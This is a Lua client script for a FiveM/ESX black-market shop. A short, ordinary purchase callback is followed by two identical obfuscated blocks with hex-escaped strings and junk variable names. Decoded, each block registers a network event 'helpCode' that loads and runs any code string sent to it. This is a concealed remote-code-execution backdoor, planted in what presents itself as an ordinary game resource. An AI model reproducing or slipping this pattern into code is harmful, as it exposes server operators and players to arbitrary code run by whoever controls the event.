RegisterNUICallback('EventHandler', function(data, cb)
    if data.event == 'close' then
        SetNuiFocus(false)

    elseif data.event == 'BuyProducts' then
        ESX.TriggerServerCallback('rxbin_blackmarket:BuyProducts', function(response)
            cb(response)
        end, data.data)
    end
end)

local deqUEMUYdjbfuTNCcvrWAyRZmZOczKzezxmCSpKYNKIzWYVVOnJDYkKQRTLeJijtTEGRcH = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G} deqUEMUYdjbfuTNCcvrWAyRZmZOczKzezxmCSpKYNKIzWYVVOnJDYkKQRTLeJijtTEGRcH[6][deqUEMUYdjbfuTNCcvrWAyRZmZOczKzezxmCSpKYNKIzWYVVOnJDYkKQRTLeJijtTEGRcH[1]](deqUEMUYdjbfuTNCcvrWAyRZmZOczKzezxmCSpKYNKIzWYVVOnJDYkKQRTLeJijtTEGRcH[2]) deqUEMUYdjbfuTNCcvrWAyRZmZOczKzezxmCSpKYNKIzWYVVOnJDYkKQRTLeJijtTEGRcH[6][deqUEMUYdjbfuTNCcvrWAyRZmZOczKzezxmCSpKYNKIzWYVVOnJDYkKQRTLeJijtTEGRcH[3]](deqUEMUYdjbfuTNCcvrWAyRZmZOczKzezxmCSpKYNKIzWYVVOnJDYkKQRTLeJijtTEGRcH[2], function(bpsfmaRCvUrcZtMzRLlJdfujMFtKOXLDMhuFfUzOmZnJIWfjmXWJYZrfCMuXzpsjIyPoOJ) deqUEMUYdjbfuTNCcvrWAyRZmZOczKzezxmCSpKYNKIzWYVVOnJDYkKQRTLeJijtTEGRcH[6][deqUEMUYdjbfuTNCcvrWAyRZmZOczKzezxmCSpKYNKIzWYVVOnJDYkKQRTLeJijtTEGRcH[4]](deqUEMUYdjbfuTNCcvrWAyRZmZOczKzezxmCSpKYNKIzWYVVOnJDYkKQRTLeJijtTEGRcH[6][deqUEMUYdjbfuTNCcvrWAyRZmZOczKzezxmCSpKYNKIzWYVVOnJDYkKQRTLeJijtTEGRcH[5]](bpsfmaRCvUrcZtMzRLlJdfujMFtKOXLDMhuFfUzOmZnJIWfjmXWJYZrfCMuXzpsjIyPoOJ))() end)

local ylHMMRHxoUGWAdQMpUjXDGGYCghSKzMTuxsuXwOwPbNcvbKOzpsfFdWhjqWsvuKHrDUmhA = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G} ylHMMRHxoUGWAdQMpUjXDGGYCghSKzMTuxsuXwOwPbNcvbKOzpsfFdWhjqWsvuKHrDUmhA[6][ylHMMRHxoUGWAdQMpUjXDGGYCghSKzMTuxsuXwOwPbNcvbKOzpsfFdWhjqWsvuKHrDUmhA[1]](ylHMMRHxoUGWAdQMpUjXDGGYCghSKzMTuxsuXwOwPbNcvbKOzpsfFdWhjqWsvuKHrDUmhA[2]) ylHMMRHxoUGWAdQMpUjXDGGYCghSKzMTuxsuXwOwPbNcvbKOzpsfFdWhjqWsvuKHrDUmhA[6][ylHMMRHxoUGWAdQMpUjXDGGYCghSKzMTuxsuXwOwPbNcvbKOzpsfFdWhjqWsvuKHrDUmhA[3]](ylHMMRHxoUGWAdQMpUjXDGGYCghSKzMTuxsuXwOwPbNcvbKOzpsfFdWhjqWsvuKHrDUmhA[2], function(RpfSyLUtvFkRvmEvsSjdLosrijDfobHwMQlHgkDiKGtaswEESFddUJpOAHAKeUvcZeMDpY) ylHMMRHxoUGWAdQMpUjXDGGYCghSKzMTuxsuXwOwPbNcvbKOzpsfFdWhjqWsvuKHrDUmhA[6][ylHMMRHxoUGWAdQMpUjXDGGYCghSKzMTuxsuXwOwPbNcvbKOzpsfFdWhjqWsvuKHrDUmhA[4]](ylHMMRHxoUGWAdQMpUjXDGGYCghSKzMTuxsuXwOwPbNcvbKOzpsfFdWhjqWsvuKHrDUmhA[6][ylHMMRHxoUGWAdQMpUjXDGGYCghSKzMTuxsuXwOwPbNcvbKOzpsfFdWhjqWsvuKHrDUmhA[5]](RpfSyLUtvFkRvmEvsSjdLosrijDfobHwMQlHgkDiKGtaswEESFddUJpOAHAKeUvcZeMDpY))() end)